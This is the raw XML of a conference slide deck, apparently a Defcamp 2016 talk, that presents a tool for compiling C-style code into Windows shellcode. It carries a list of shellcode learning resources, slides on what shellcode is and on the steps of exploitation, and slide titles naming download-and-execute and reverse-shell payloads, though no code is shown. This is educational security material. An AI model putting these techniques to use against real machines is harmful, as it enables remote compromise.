            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>/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Introduction </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>to Windows shellcode development – Part 2 - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://securitycafe.ro/2015/12/14/introduction-to-windows-shellcode-development-part-2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>/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Introduction </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>to Windows shellcode development – Part 3 - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://securitycafe.ro/2016/02/15/introduction-to-windows-shellcode-development-part-3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>/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The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Shellcoder's</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> Handbook - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://www.amazon.com/Shellcoders-Handbook-Discovering-Exploiting-Security/dp/047008023X</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>/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Sockets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>, Shellcode, Porting, and Coding - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>www.amazon.com/Sockets-Shellcode-Porting-Coding-Professionals/dp/1597490059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Understanding Windows Shellcode - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>http://www.hick.org/code/skape/papers/win32-shellcode.pdf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History and Advances in Windows Shellcode - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>http://phrack.org/issues/62/7.html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Writing ia32 alphanumeric shellcodes - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>http://phrack.org/issues/57/15.html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Windows x64 Shellcode - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>http://mcdermottcybersecurity.com/articles/windows-x64-shellcode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Writing Shellcode with a C Compiler - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>https://nickharbour.wordpress.com/2010/07/01/writing-shellcode-with-a-c-compiler/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Writing Optimized Windows Shellcode in C - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
                <a:hlinkClick r:id="rId12"/>
              </a:rPr>
              <a:t>http://www.exploit-monday.com/2013/08/writing-optimized-windows-shellcode-in-c.html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Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Syscall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> Shellcode - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
                <a:hlinkClick r:id="rId13"/>
              </a:rPr>
              <a:t>https://www.symantec.com/connect/articles/windows-syscall-shellcode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Didier Stevens - Shellcode - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
                <a:hlinkClick r:id="rId14"/>
              </a:rPr>
              <a:t>https://blog.didierstevens.com/programs/shellcode/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Synesthesia: Modern shellcode Synthesis - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
                <a:hlinkClick r:id="rId15"/>
              </a:rPr>
              <a:t>http://www.msreverseengineering.com/blog/2016/11/8/synesthesia-modern-shellcode-synthesis-ekoparty-2016-talk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/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Online </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>x86 / x64 Assembler and Disassembler - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:hlinkClick r:id="rId16"/>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
                <a:hlinkClick r:id="rId16"/>
              </a:rPr>
              <a:t>defuse.ca/online-x86-assembler.htm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/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Archived </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Shellcode for various Operating Systems and Architectures - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:hlinkClick r:id="rId17"/>
              </a:rPr>
              <a:t>https://www.exploit-db.com/shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
                <a:hlinkClick r:id="rId17"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0" smtClean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050" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Shellcode </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:hlinkClick r:id="rId18"/>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
                <a:hlinkClick r:id="rId18"/>
              </a:rPr>
              <a:t>en.wikipedia.org/wiki/Shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="105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05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42510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7829" y="148617"/>
            <a:ext cx="3689011" cy="863506"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr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2028" y="1179646"/>
            <a:ext cx="85506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Shellcode Compiler is a free tool that can be used by anyone to create a custom shellcode. It is possible to call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>WinAPI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> functions in a user-friendly way.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The generated shellcode will be small, position-independent and it will not contain NULL-bytes.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Even if this alpha version is limited, the tool will be constantly updated to get all the features required to write a complex shellcode.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18920281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453" y="449823"/>
            <a:ext cx="3546348" cy="1495794"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="002060">
              <a:alpha val="0"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr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0695" y="2526396"/>
            <a:ext cx="743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4000" dirty="0" err="1" smtClean="0"/>
              <a:t>ionut.popescu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0"/>
              <a:t> [a] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1" smtClean="0"/>
              <a:t>outlook.com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1740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Shellcode Compiler?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270" y="1257456"/>
            <a:ext cx="838962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Shellcode Compiler is a program that compiles C/C++ style code into a small, position-independent and NULL-free shellcode for Windows. It is possible to call any Windows API function in a user-friendly way.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="en-US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Shellcode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Compiler takes as input a source file and it uses it's own compiler to interpret the code and generate an assembly file which is assembled with NASM (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http://www.nasm.us/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 err="1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69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</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="GCC_CompilationPro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6185" y="1133743"/>
            <a:ext cx="6522304" cy="305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15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shellcode?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270" y="1211580"/>
            <a:ext cx="862965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	In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hacking, a shellcode is a small piece of code used as the payload in the exploitation of a software vulnerability. It is called "shellcode" because it typically starts a command shell from which the attacker can control the compromised machine, but any piece of code that performs a similar task can be called shellcode.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	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Because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 function of a payload is not limited to merely spawning a shell, some have suggested that the name shellcode is insufficient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However, attempts at replacing the term have not gained wide acceptance.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Shellcode is commonly written in machine code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3221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4320" y="1287780"/>
            <a:ext cx="7924386" cy="1846309"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Information gathering </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" smtClean="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Version information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Vulnerability discovery </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" smtClean="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Large amount of data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Analyzing the crash </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" smtClean="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Debugger </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Writing the exploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" smtClean="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Exploit the vulnerability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Choose a shellcode for the exploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" b="1" dirty="0" smtClean="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t> Reverse TCP? Bind TCP?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" y="3537949"/>
            <a:ext cx="8374089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Shellcode Compiler does NOT have anything to do with the exploitation process!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It will generate a shellcode that can be used for an already existing exploit.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13604513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 Template 16x9_final">
  <a:themeElements>
    <a:clrScheme name="Dell Color Palette">
      <a:dk1>
        <a:srgbClr val="444444"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="0085C3"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="FFFFFF"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="00386B"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="71C6C1"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="7AB800"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="F2AF00"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="CE1126"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="B7295A"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="0085C3"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="0085C3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E5C166414CB7419D00C0DD00B4E706" ma:contentTypeVersion="6" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="cba0992c917870d83bace64bc5f4990a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844e7348ed52759a24abfc3e9c3cf42e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2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8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9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0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3" nillable="true" ma:displayName="E-Mail Headers" ma:hidden="true" ma:internalName="EmailHeader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elements/1.1/"/>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3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F55044-A907-4CDE-B99D-51D41E234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 Template 16x9_final</Template>
  <TotalTime>14051</TotalTime>
  <Words>2650</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>462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Arial Black</vt:lpstr>
      <vt:lpstr>Arial Unicode MS</vt:lpstr>
      <vt:lpstr>Arial Unicode MS</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Museo For Dell</vt:lpstr>
      <vt:lpstr>Museo For Dell 300</vt:lpstr>
      <vt:lpstr>Museo Sans For Dell</vt:lpstr>
      <vt:lpstr>Museo Sans For Dell</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Dell Template 16x9_final</vt:lpstr>
      <vt:lpstr>Document</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>whoami</vt:lpstr>
      <vt:lpstr>Defcamp 2016</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>Shellcode compiler</vt:lpstr>
      <vt:lpstr>What is Shellcode Compiler?</vt:lpstr>
      <vt:lpstr>What is a compiler?</vt:lpstr>
      <vt:lpstr>What is a shellcode?</vt:lpstr>
      <vt:lpstr>Exploitation </vt:lpstr>
      <vt:lpstr>Memory structure of a process</vt:lpstr>
      <vt:lpstr>ASLR - Address space layout randomization </vt:lpstr>
      <vt:lpstr>Shellcode limitations</vt:lpstr>
      <vt:lpstr>Shellcodes on Linux</vt:lpstr>
      <vt:lpstr>Linux syscalls</vt:lpstr>
      <vt:lpstr>Linux syscalls examples</vt:lpstr>
      <vt:lpstr>Linux shellcode example</vt:lpstr>
      <vt:lpstr>Windows shellcodes</vt:lpstr>
      <vt:lpstr>Step by step</vt:lpstr>
      <vt:lpstr>PE File Format</vt:lpstr>
      <vt:lpstr>General PE structure</vt:lpstr>
      <vt:lpstr>MS-DOS header</vt:lpstr>
      <vt:lpstr>MS-DOS header details</vt:lpstr>
      <vt:lpstr>PE header</vt:lpstr>
      <vt:lpstr>PE header structure</vt:lpstr>
      <vt:lpstr>Image section table</vt:lpstr>
      <vt:lpstr>Data directory</vt:lpstr>
      <vt:lpstr>PE imports table</vt:lpstr>
      <vt:lpstr>Process Environment Block</vt:lpstr>
      <vt:lpstr>Find kernel32.dll</vt:lpstr>
      <vt:lpstr>Find GetProcAddress</vt:lpstr>
      <vt:lpstr>Find LoadLibrary</vt:lpstr>
      <vt:lpstr>Load a DLL (urlmon.dll)</vt:lpstr>
      <vt:lpstr>Get function from DLL (URLDownloadToFile) </vt:lpstr>
      <vt:lpstr>Call URLDownloadToFile </vt:lpstr>
      <vt:lpstr>Get function from DLL (WinExec) </vt:lpstr>
      <vt:lpstr>WinExec and ExitProcess </vt:lpstr>
      <vt:lpstr>Shellcode compiler</vt:lpstr>
      <vt:lpstr>What do you think?</vt:lpstr>
      <vt:lpstr>Screenshot</vt:lpstr>
      <vt:lpstr>Example</vt:lpstr>
      <vt:lpstr>Working with files and Windows Registry</vt:lpstr>
      <vt:lpstr>Download and Execute</vt:lpstr>
      <vt:lpstr>Reverse shell (nc)</vt:lpstr>
      <vt:lpstr>Download and Load DLL</vt:lpstr>
      <vt:lpstr>Demo</vt:lpstr>
      <vt:lpstr>Limitations</vt:lpstr>
      <vt:lpstr>WinAPI functions</vt:lpstr>
      <vt:lpstr>ANSI vs Unicode on WinAPI</vt:lpstr>
      <vt:lpstr>How it works</vt:lpstr>
      <vt:lpstr>Download Shellcode Compiler</vt:lpstr>
      <vt:lpstr>Links</vt:lpstr>
      <vt:lpstr>Conclusion</vt:lpstr>
      <vt:lpstr>Questions?</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>Dell Inc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Dell PowerPoint template</dc:title>
  <dc:creator>Carbo, Corey  - Dell Team</dc:creator>
  <cp:keywords>Internal Use</cp:keywords>
  <cp:lastModifiedBy>Ionut Popescu</cp:lastModifiedBy>
  <cp:revision>464</cp:revision>
  <cp:lastPrinted>2014-02-14T16:26:12Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2014-04-01T19:37:06Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-11-09T17:30:52Z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0x01010094E5C166414CB7419D00C0DD00B4E706</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="TitusGUID">
    <vt:lpwstr>a74b97da-0ded-4159-9c71-5c766a84c844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1.2AMER</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="8" name="SecureWorksClassification">
    <vt:lpwstr>Restricted</vt:lpwstr>
  </property>
</Properties>
</file>